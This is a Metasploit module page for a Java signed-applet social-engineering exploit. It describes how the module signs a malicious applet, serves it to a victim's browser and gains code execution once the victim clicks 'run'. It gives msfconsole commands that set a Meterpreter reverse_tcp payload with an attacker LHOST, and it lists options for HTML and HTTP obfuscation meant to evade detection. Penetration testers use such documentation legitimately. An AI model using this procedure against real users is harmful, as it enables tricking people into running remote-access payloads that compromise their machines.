Browse Exploit & Auxiliary Modules
The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.
Search for modules
Java Signed Applet Social Engineering Code Execution
This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs the it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it's not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks "run", the applet executes with full user permissions.
Rank
- Excellent
Authors
- natron < natron [at] metasploit.com >
References
- http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith...
- http://www.spikezilla-software.com/blog/?p=21
Exploit Targets
- 0 - Generic (Java Payload)
- 1 - Windows x86 (Native Payload) (default)
- 2 - Linux x86 (Native Payload)
- 3 - Mac OS X PPC (Native Payload)
- 4 - Mac OS X x86 (Native Payload)
Development
Similar Modules
- exploit/multi/browser/firefox_escape_retval
- exploit/multi/browser/firefox_queryinterface
- exploit/multi/browser/itms_overflow
- exploit/multi/browser/java_calendar_deserialize
- exploit/multi/browser/java_getsoundbank_bof
- exploit/multi/browser/java_rhino
- exploit/multi/browser/java_rmi_connection_impl
- exploit/multi/browser/java_setdifficm_bof
- exploit/multi/browser/java_trusted_chain
- exploit/multi/browser/mozilla_compareto
Usage Information
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet) > show payloads
msf exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(java_signed_applet) > set LHOST [MY IP ADDRESS]
msf exploit(java_signed_applet) > exploit
Module Options
| APPLETNAME | The main applet's class name. (default: SiteLoader) |
| CERTCN | The CN= value for the certificate. Cannot contain ',' or '/' (default: SiteLoader) |
| SRVHOST | The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0) |
| SRVPORT | The local port to listen on. (default: 8080) |
| SSL | Negotiate SSL for incoming connections |
| SSLCert | Path to a custom SSL certificate (default is randomly generated) |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3) |
| SigningCert | Path to a signing certificate in PEM or PKCS12 (.pfx) format |
| SigningKey | Path to a signing key in PEM format |
| SigningKeyPass | Password for signing key (required if SigningCert is a .pfx) |
| URIPATH | The URI to use for this exploit (default is random) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EXE::Custom | Use custom exe instead of automatically generating a payload exe |
| EXE::FallBack | Use the default template in case the specified one is missing |
| EXE::Inject | Set to preserve the original EXE function |
| EXE::OldMethod | Set to use the substitution EXE generation method. |
| EXE::Path | The directory in which to look for the executable template |
| EXE::Template | The executable template file name. |
| EnableContextEncoding | Use transient context when encoding payloads |
| ListenerComm | The specific communication channel to use for this service |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| HTML::base64 | Enable HTML obfuscation via an embeded base64 html object (IE not supported) (accepted: none, plain, single_pad, double_pad, random_space_injection) |
| HTML::javascript::escape | Enable HTML obfuscation via HTML escaping (number of iterations) |
| HTML::unicode | Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be) |
| HTTP::chunked | Enable chunking of HTTP responses via "Transfer-Encoding: chunked" |
| HTTP::compression | Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate) |
| HTTP::header_folding | Enable folding of HTTP headers |
| HTTP::junk_headers | Enable insertion of random junk HTTP headers |
| HTTP::server_name | Configures the Server header of all outgoing replies |
| TCP::max_send_size | Maximum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |